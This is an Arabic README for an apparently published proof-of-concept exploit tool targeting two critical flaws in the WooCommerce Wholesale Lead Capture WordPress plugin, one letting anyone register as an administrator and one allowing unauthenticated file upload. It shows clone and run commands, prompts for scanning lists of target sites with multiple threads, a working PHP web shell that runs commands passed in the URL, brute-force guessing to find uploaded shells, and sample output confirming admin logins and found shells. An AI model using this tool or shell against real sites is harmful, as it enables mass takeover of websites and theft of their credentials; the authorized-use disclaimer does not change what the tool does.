
امتياز غير مُصادَق عليه | رفع ملفات تعسفي غير مُصادَق عليه
الوصف:
إضافة WooCommerce Wholesale Lead Capture لنظام WordPress عرضة لثغرة تصعيد امتيازات دون مصادقة في جميع الإصدارات المتأثرة المعروفة. تكمن الثغرة داخل معالج إجراء AJAX wwlc_create_user، الذي يعالج طلبات تسجيل المستخدمين دون تنقية أو تحقق كافٍ من حقول الأدوار المقدمة من المستخدم. يمكن لمهاجم بعيد غير مصادق صياغة طلب POST مخصص يحقن حقول قدرات WordPress عشوائية — بما في ذلك wp_capabilities[administrator] — مباشرة في بيانات المستخدم الوصفية (user metadata) وقت إنشاء الحساب. يتيح ذلك للمهاجم تسجيل نفسه كمسؤول WordPress دون أي مصادقة مسبقة أو تفاعل من مستخدم شرعي، مما يؤدي إلى اختراق كامل لتثبيت WordPress المتأثر.
الوصف:
إضافة WooCommerce Wholesale Lead Capture لنظام WordPress عرضة لثغرة رفع ملفات تعسّفي دون مصادقة في جميع الإصدارات المتأثرة المعروفة. تكمن الثغرة في إجراء AJAX wwlc_file_upload_handler، الذي يُسجَّل دون أي اشتراط للمصادقة أو التحقق من nonce. من خلال إرسال طلب POST متعدد الأجزاء (multipart) مخصص إلى /wp-admin/admin-ajax.php، يمكن لمهاجم بعيد غير مصادق رفع ملفات من أي نوع — بما في ذلك قشرة ويب PHP — إلى دليل wp-content/uploads/ على الخادم داخل مجلد فرعي مولّد ديناميكيًا باسم wwlc-temp-*. يؤدي الاستغلال الناجح إلى تنفيذ تعليمات برمجية عن بُعد (RCE) على خادم الويب الأساسي الذي يعمل بحساب مستخدم عملية الويب.
هذا برنامج إثبات مفهوم (PoC) لاستغلال الثغرتين الحرجتين الموصوفتين أعلاه، ويستهدف تثبيتات WordPress التي تشغّل إضافة WooCommerce Wholesale Lead Capture. تدعم الأداة وضعَي هجوم مستقلين:
| الوضع | نوع الهجوم | الهدف |
|---|---|---|
| الوضع 1 | رفع ملفات تعسّفي دون مصادقة + اكتشاف المجلدات بالقوة الغاشمة | رفع قشرة ويب PHP وتحديد موقعها عبر تخمين المجلدات متعدد الطبقات |
| الوضع 2 | تصعيد امتيازات دون مصادقة عبر التسجيل | تسجيل النفس كمسؤول WordPress والتحقق من الوصول الإداري |
pip install requests urllib3 colorama
أو التثبيت عبر ملف المتطلبات:
pip install -r requirements.txt
requirements.txt:
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py
python3 CVE-2026-27542_CVE-2026-27540.py
تعرض الأداة واجهة طرفية تفاعلية. سيُطلب منك إدخال جميع المعاملات المطلوبة.
أنشئ ملفًا نصيًا بسيطًا (مثل list.txt) يحتوي على عنوان URL هدف واحد في كل سطر:
https://target1.com
https://target2.com
http://target3.com/wordpress
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt
مثال ملف القشرة (shell.php):
<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>
ملاحظة: يتم إنشاء مجلد
wwlc-temp-*ديناميكيًا بواسطة الإضافة باستخدام دالة PHPuniqid('wwlc-temp-'). تستخدم الأداة استراتيجية قوة غاشمة متعددة الطبقات لاكتشافه:
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:
تقوم الأداة بما يلي:
administrator| الملف | الوصف |
|---|---|
scan_results/wwlc_uploads.txt |
[INFO] Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO] https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2
[INFO] Mode1 | Target: https://target.com
[INFO] https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO] https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO] https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s
بواسطة: Nxploited (خالد العنزي)
هذه الأداة مُقدمة لأغراض التعليم والبحث الأمني المصرح به فقط.
لا يقرّ المؤلف، Nxploited (خالد العنزي)، وجميع المساهمين في هذا المشروع، بإساءة استخدام هذه الأداة ولا يدعمونها ولا يتحملون أي مسؤولية عن أي ضرر ناتج عن استخدام هذا البرنامج ضد أنظمة ليس لديك إذن كتابي صريح لاختبارها.
- ✅ مسموح: الاستخدام على الأنظمة التي تملكها أو حصلت على إذن كتابي صريح لاختبارها.
- ❌ محظور: الاستخدام ضد أي أنظمة دون إذن كتابي صريح مسبق من مالك النظام.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني ويُعاقَب عليه بموجب القوانين المعمول بها بما في ذلك على سبيل المثال لا الحصر قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA)، وقانون إساءة استخدام الكمبيوتر (CMA)، وما يعادلها من تشريعات حول العالم.
باستخدامك لهذه الأداة، فإنك تتحمل المسؤولية الكاملة عن أفعالك وتؤكد أن لديك السلطة القانونية لاختبار الأنظمة المستهدفة.
لا يتحمل المؤلف أي مسؤولية على الإطلاق عن أي أضرار مباشرة أو غير مباشرة أو عرضية أو تبعية تنشأ عن استخدام أو إساءة استخدام هذا البرنامج.
© 2026 Nxploited (خالد العنزي) — لأغراض البحث الأمني المصرح به فقط.
| الحقل | التفاصيل |
|---|
| معرّف CVE | CVE-2026-27542 |
| الخطورة | حرِجة — درجة CVSS v3.1: 9.8 |
| المتجه | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| المكوّن المتأثر | إضافة WooCommerce Wholesale Lead Capture (WWLC) لنظام WordPress |
| نوع الثغرة | تصعيد امتيازات دون مصادقة |
| المصادقة المطلوبة | لا شيء |
| CWE | CWE-269: إدارة امتيازات غير سليمة |
| الحقل | التفاصيل |
|---|
| معرّف CVE | CVE-2026-27540 |
| الخطورة | حرِجة — درجة CVSS v3.1: 9.8 |
| المتجه | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| المكوّن المتأثر | إضافة WooCommerce Wholesale Lead Capture (WWLC) لنظام WordPress |
| نوع الثغرة | رفع ملفات تعسّفي دون مصادقة (يؤدي إلى تنفيذ تعليمات برمجية عن بُعد) |
| المصادقة المطلوبة | لا شيء |
| CWE | CWE-434: رفع ملف غير مقيد من نوع خطير |
| الطبقة | الاستراتيجية | الوصف |
|---|
| 0 | سرد الدليل | محاولة سرد دليل uploads إذا كان مفتوحًا |
| 1 | مبنية على الأنماط | تخمينات رقمية مشتقة من الوقت ومتسلسلة |
| 2 | Hex مبني على الوقت | مُستندة إلى الطوابع الزمنية لطلبات HTTP المرصودة |
| 3 | Hex عشوائي | تخمين سلاسل hex عشوائية بحتة |
| جميع المواقع التي نجح فيها رفع الملفات (الوضع 1) |
scan_results/wwlc_shells_found.txt | روابط القشور الكاملة التي تأكد إمكانية الوصول إليها (الوضع 1) |
scan_results/wwlc_register_results.txt | جميع نتائج محاولات التسجيل مع بيانات الاعتماد (الوضع 2) |
scan_results/Admin_login.txt | تسجيلات دخول الإدارة المؤكدة مع بيانات الاعتماد (الوضع 2) |